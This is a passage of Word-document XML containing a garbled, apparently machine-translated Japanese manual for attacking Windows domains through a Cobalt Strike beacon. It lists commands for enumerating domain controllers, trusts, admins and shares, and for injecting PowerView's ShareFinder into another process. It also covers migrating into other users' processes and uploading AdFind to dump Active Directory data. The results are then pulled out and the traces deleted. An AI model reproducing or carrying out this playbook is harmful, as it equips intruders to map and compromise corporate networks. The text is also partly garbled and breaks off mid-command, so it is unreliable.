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C20E" w14:textId="42E39C11" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>手動コバルトストライク</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBF7F70" w14:textId="440DA908" w:rsidR="00522AD5" w:rsidRDefault="00974BCF" w:rsidP="00522AD5">
      <w:r>
        <w:t>---------</w:t>
      </w:r>
      <w:r w:rsidR="00522AD5">
        <w:t>--------------------------------------------標準コマンド---------------------------------------------------!</w:t>
      </w:r>
      <w:r w:rsidR="00522AD5">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00522AD5">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00522AD5">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00522AD5">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00522AD5">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00522AD5">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00522AD5">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="638891D3" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">負荷生成 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094F36F4" w14:textId="070CBFDD" w:rsidR="00522AD5" w:rsidRDefault="00974BCF" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ttacks </w:t>
      </w:r>
      <w:r w:rsidR="00522AD5">
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>ackages</w:t>
      </w:r>
      <w:r w:rsidR="00522AD5">
        <w:t>-&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFBE650" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="60BF6354" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>対話 - エージェントの選択</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2952664F" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>help -&gt;はコマンドのリストを表示します</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592BA18A" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>help [command]は、特定のコマンドのヘルプを表示します</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E117DA" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="4B5CF58A" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="484485F9" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>-----------------------------------------------------AD情報収集--------------------------------------------------!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D48F4E" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="008A61C1" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>---ドメイン コントローラの取得---!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D4E85A" w14:textId="2AAC4B91" w:rsidR="00522AD5" w:rsidRDefault="00974BCF" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00522AD5">
        <w:t>domain_controllers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1DE2AA3A" w14:textId="67899977" w:rsidR="00522AD5" w:rsidRDefault="00974BCF" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">et </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dcl</w:t>
      </w:r>
      <w:r w:rsidR="00522AD5">
        <w:t>ist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00522AD5">
        <w:t>の</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA936BC" w14:textId="1FDDF086" w:rsidR="00522AD5" w:rsidRDefault="00974BCF" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>hell</w:t>
      </w:r>
      <w:r w:rsidR="00522AD5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00522AD5">
        <w:t>nltest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00522AD5">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00522AD5">
        <w:t>dclist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="45A57E99" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="78F6852D" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>---コンピューターの一覧を取得します---!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3470F9B0" w14:textId="77777777" w:rsidR="00492248" w:rsidRDefault="00492248" w:rsidP="00492248">
      <w:r>
        <w:t>shell net group "Domain Computers" /domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2796F2" w14:textId="77777777" w:rsidR="00492248" w:rsidRDefault="00492248" w:rsidP="00492248">
      <w:r>
        <w:t>net computers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D6C318" w14:textId="77777777" w:rsidR="00492248" w:rsidRDefault="00492248" w:rsidP="00492248">
      <w:r>
        <w:t>net view</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240728E4" w14:textId="77777777" w:rsidR="00492248" w:rsidRDefault="00492248" w:rsidP="00492248">
      <w:r>
        <w:t xml:space="preserve">Get-ADComputer -Filter {enabled -eq $true} -properties *|select Name, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DNSHostName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OperatingSystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> !--Test--!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EF7248" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRPr="00492248" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="750006CD" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>---サブドメインのリストを取得します---!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ADCAFC" w14:textId="77777777" w:rsidR="00492248" w:rsidRDefault="00492248" w:rsidP="00492248">
      <w:r>
        <w:t xml:space="preserve">net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>domain_trusts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="10511891" w14:textId="77777777" w:rsidR="00492248" w:rsidRDefault="00492248" w:rsidP="00492248">
      <w:r>
        <w:t xml:space="preserve">shell </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nltest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /DOMAIN_TRUSTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB165DB" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRPr="00492248" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="329D653E" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>---グループとユーザーの一覧を取得します---!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E558168" w14:textId="39BFF79C" w:rsidR="00492248" w:rsidRDefault="00492248" w:rsidP="00522AD5">
      <w:r>
        <w:t>- ドメイン管理者のリスト ;ドイツ人向け - シェルネットグループ "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Domänen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-Admins" /domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B41B777" w14:textId="1EC9AB5E" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">shell net group "domain Admins" /domain </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03283610" w14:textId="32A30CA2" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>shell net group "Enterprise Admins" /domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B6BB26" w14:textId="7436989D" w:rsidR="00492248" w:rsidRDefault="00492248" w:rsidP="00522AD5">
      <w:r>
        <w:t>- ドメインユーザーのリスト</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AEB185" w14:textId="0F80166C" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>shell net group "domain users" /domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E7C05C" w14:textId="77777777" w:rsidR="00492248" w:rsidRDefault="00492248" w:rsidP="00492248">
      <w:r>
        <w:t>net group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CB66DB" w14:textId="77777777" w:rsidR="00492248" w:rsidRDefault="00492248" w:rsidP="00492248">
      <w:r>
        <w:t xml:space="preserve">net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6B35CCCD" w14:textId="77777777" w:rsidR="00492248" w:rsidRDefault="00492248" w:rsidP="00492248">
      <w:r>
        <w:t>net user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7106ED21" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="69DCF08A" w14:textId="77777777" w:rsidR="00492248" w:rsidRDefault="00492248" w:rsidP="00522AD5"/>
    <w:p w14:paraId="3E62C27D" w14:textId="77777777" w:rsidR="00492248" w:rsidRPr="00492248" w:rsidRDefault="00492248" w:rsidP="00522AD5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31C40AF8" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>！---かつ---！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAA40A1" w14:textId="5D7E4F15" w:rsidR="00492248" w:rsidRDefault="00492248" w:rsidP="00522AD5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>- PC が属するドメインを表示します</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E5973F" w14:textId="245099BF" w:rsidR="00522AD5" w:rsidRDefault="00492248" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>domain|systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>findstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /B "Domain"</w:t>
      </w:r>
      <w:r w:rsidR="00522AD5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655FC329" w14:textId="25CEE266" w:rsidR="00492248" w:rsidRDefault="00492248" w:rsidP="00522AD5">
      <w:r>
        <w:t>- PC上のアクティブなセッションを表示します</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE82CD8" w14:textId="0B62B8FF" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>net sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10180F3E" w14:textId="060D81B6" w:rsidR="00492248" w:rsidRDefault="00492248" w:rsidP="00522AD5">
      <w:r>
        <w:t>- PCの時刻を表示します</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280D35F5" w14:textId="51873A8A" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>net time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DDDA4B" w14:textId="1B0C336F" w:rsidR="00492248" w:rsidRDefault="00492248" w:rsidP="00522AD5">
      <w:r>
        <w:t>- PCにログインしているユーザーのリストを表示します</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDBC987" w14:textId="77324DD0" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>net logons</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CF0B80" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="08F8DD9C" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>---</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ShareFinder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>の入手---!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709DD729" w14:textId="72544291" w:rsidR="007F68EF" w:rsidRDefault="007F68EF" w:rsidP="00522AD5">
      <w:r>
        <w:t>- PCで共有のリストを表示します</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5A4E50" w14:textId="344037CE" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">net share </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797B2614" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="0470D75D" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用可能な共有を収集し</w:t>
      </w:r>
      <w:r>
        <w:t>、ドメイン内の現在のユーザーが使用できる共有$ADMINがあるかどうかを確認します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7802B544" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-import /opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PowerSploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-dev/Recon/PowerView.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF0F189" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ShareFinder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CheckShareAccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -詳細</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286EC3C0" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>アナログ</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C587252" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-import /opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PowerSploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-dev/Recon/ShareFinder.ps1 を実行します</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282677E7" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D290AA" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>psinject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 4728 x86 Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ShareFinder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CheckShareAccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -詳細 |出力ファイル -エンコーディング ascii C:\ProgramData\found_shares.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3704A8FE" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>(スキャンが開始され、その結果がファイルに記録された時点で、スキャンが終了してダウンロードできるようになったとき、ファイル全体がサイズになります)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D3ECF1" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="0535BD22" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>また</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>コマンドを使用してプロセスを確認することを忘れないでください、そこでユーザーを見つけ、そのプロセスに移行し&gt;&gt;プロセスリストを探索し、別のユーザーのプロセスを選択する&gt;。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A5842F" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>新しいユーザーに移行した後、ボールを削除して、彼とブレイクできる場所を確認する必要もあります</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCD002D" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ボールを削除すると、C:\ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ProgramData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>ディレクトリでの引き出しの最後にsh.txtまたはshares.txtがあり、ダウンロードして、教科書に「リモート管理」がいくつあるかを確認し、複数ある場合は、別のコンピューターにアクセスできることを意味します</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8C96FE" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="58893D2D" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>---追加ツール---!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FCDC50" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="369CB14B" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>-AdFind.exeを使用してActive Directoryの構成に関する情報を収集します-!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344A67FC" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Adfind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>、.exe、およびadf.batを書き込み可能なフォルダにアップロードします</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2583EAF1" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>このフォルダ内のCobalt Strikeビーコンに移動します</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D8E276" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>シェル adf.bat を実行する</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B74AA93" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>スクリプトが終了するのを待っています</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C09DD9" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>結果をポンプで送り出し、マシンにロードされたものを削除します</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39745C82" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="400DB66D" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> adf.bat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> の内容:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691C4D36" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="7DCAF3BE" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>adfind.exe -f "(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>objectcategory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=person)" &gt; ad_users.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF5CC23" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>adfind.exe -f "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>objectcategory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=computer" &gt; ad_computers.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A54E55" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>adfind.exe -f "(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>objectcategory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>organizationalUnit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)" &gt; ad_ous.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BAD0D9" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>adfind.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>trustdmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; trustdmp.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEAD0A1" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>adfind.exe -subnets -f (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>objectCategory</w:t>
      </w:r>
